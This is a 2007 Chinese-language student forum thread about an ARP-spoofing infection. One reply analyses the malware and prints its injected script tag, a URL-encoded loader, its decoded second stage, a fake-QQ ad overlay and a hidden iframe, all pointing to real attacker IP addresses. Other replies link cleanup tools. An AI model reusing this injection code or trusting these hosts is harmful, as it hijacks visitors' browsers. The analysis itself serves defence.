强大的木马让我崩溃了，那位能人帮帮忙

gdutye · 发表于 2007-12-28 23:52

多些各位高手指点，正在实验中。。。。

gdutye · 发表于 2007-12-29 00:02

郁闷死，搜了一下，360安全论坛也很多人求助，但暂时没有人能提出有效方法杀毒。
又一个ARP病毒,带GG广告和百万q币大放送的仿腾讯

最主要的特征是在网页第一行有<script src=http://121.11.245.180/1.js></script> 的脚本..
我们看一下具体的图

打开上边那个１.js,可以发现有经下内容
document.write(unescape(’%3Cscript%3E%0D%0A%0D%0Adocument.writeln%28%22%3Cscript%20type%3D%5C%22text%5C/javascript%5C%22%20src%20%3D%20%5C%22http%3A%5C/%5C/121.15.245.60%5C/oo.asp%5C%22%3E%3C%5C/script%3E%22%29%0D%0A%0D%0A%3C/script%3E’))
注意,还是unescape过的,我们解密一下,看到
document.write(unescape(’<script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/oo.asp\”><\/script>”)
</script>’))
我们打开http://121.15.245.60/oo.asp　可以看到源码是
<script src=http://121.11.245.180/1.js></script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/ooo.js\”><\/script>”)
上边那个我们见过了,看下边的..下载,打开
document.writeln(”<center>”);
window.onerror = function (){return true};
function hgbrand(a)
{
  return p***Int((a)*Math.random()+1);
}
function hgbvclosew(a,b)
{
  document.getElementById(a).location=’about:blank’;
  document.getElementById(b).innerHTML=”";
}
优文网络提醒您,上边这个innerHTML=”";用的是动态插入,所以你看到的广告或其他的是不同的..
var hgbnumTemp;
hgbnumTemp=hgbrand(6);
if (hgbnumTemp==1)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==2)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==3)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

if (hgbnumTemp==4)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==5)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
///这几个是GG广告,发布者ID　pub-6651899251830388,　不知是病毒作者的还是有意要陷害其他人的..
document.writeln(”<div id=\”adid\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/play.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/jq5.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadid1dfas23()\”,200);function runadid1dfas23(){document.all.adid.style.top=document.body.scrollTop+document.body.clientHeight-159;document.all.adid.style.left=document.body.scrollLeft +document.body.clientWidth-256}<\/script>”)
}
///这个就是下边那个仿QQ的代码..
if (hgbnumTemp==6)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
///这个也是GG广告,同上
document.writeln(”<div id=\”adidd\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/qq.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/qq2.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadidd1dfas23()\”,200);function runadidd1dfas23(){document.all.adidd.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.adidd.style.left=document.body.scrollLeft +document.body.clientWidth-209}<\/script>”)
}
///这个也是下边那个仿QQ的代码..
document.writeln(”<iframe src=\”http:\/\/w.c0mo.com\/1.htm\” width=\”0\” height=\”0\”><\/iframe>”);
document.writeln(”</center>”);
注意上边这个ifame,打开,原来是个统计代码,这病毒作者也是分析专家呀..代码如下
<script src=’http://s119.cnzz.com/stat.php?id=675882&web_id=675882&show=pic1′ language=’JavaScript’ ch***t=’gb2312′></script>
以上就是代码的具体分析

gdutye · 发表于 2007-12-29 00:04

以上网站大家不要点，可能有毒。

游魂 · 发表于 2007-12-29 10:46

我比较喜欢用 windows清理助手还有清理系统和IE的临时文件

Windows清理助手、恶意软件清理助手清理恶意软件升级查一下：
http://www.arswp.com/download/arswp2/arswp2.zip

下载临时文件清理工具
http://www.dodudou.com/down/ATF-C***er-cn.exe

游魂 · 发表于 2007-12-29 10:49

若是重装,在文件选项里设置显示所有文件,包括系统隐藏的文件..
不要右击和双击打开盘符,最好是在地址栏和资源管理器打开...
然后把里面可疑的隐藏文件夹或文件删了...

gdutye · 发表于 2007-12-29 12:59

今天终于找到了病毒的根源，原来是受同一条网线其中的一台机的攻击，网上有人说是ARP病毒，下载安装了360ARP防火墙，果然显示是他攻击，但苦在正在紧张的课程设计过程中，唯有等设计完了再全部机一起重装。

Hacking · 发表于 2007-12-29 13:02

试一下AVG

2002070344 · 发表于 2007-12-29 15:58

不要轻易重装

这个名字已注册 · 发表于 2007-12-29 20:00

未解决未解决？！

gdutye · 发表于 2007-12-30 12:34

极力吹促同学重装杀毒之后，再没有受到他的攻击了。问题已解决了，多些各位同学的解求。Thanks

rex86 · 发表于 2007-12-30 12:41

https://www.gdutbbs.com/viewthrea ... &extra=page%3D3
LZ 体体是否类似甘既病症很可能中AV 变种病毒

jank · 发表于 2007-12-30 12:58

你试下用费尔托斯特安全杀毒!

樱桃丸子 · 发表于 2009-4-12 11:38

重装无效.

好强大啊

		自动登录	找回密码
密码			加入后院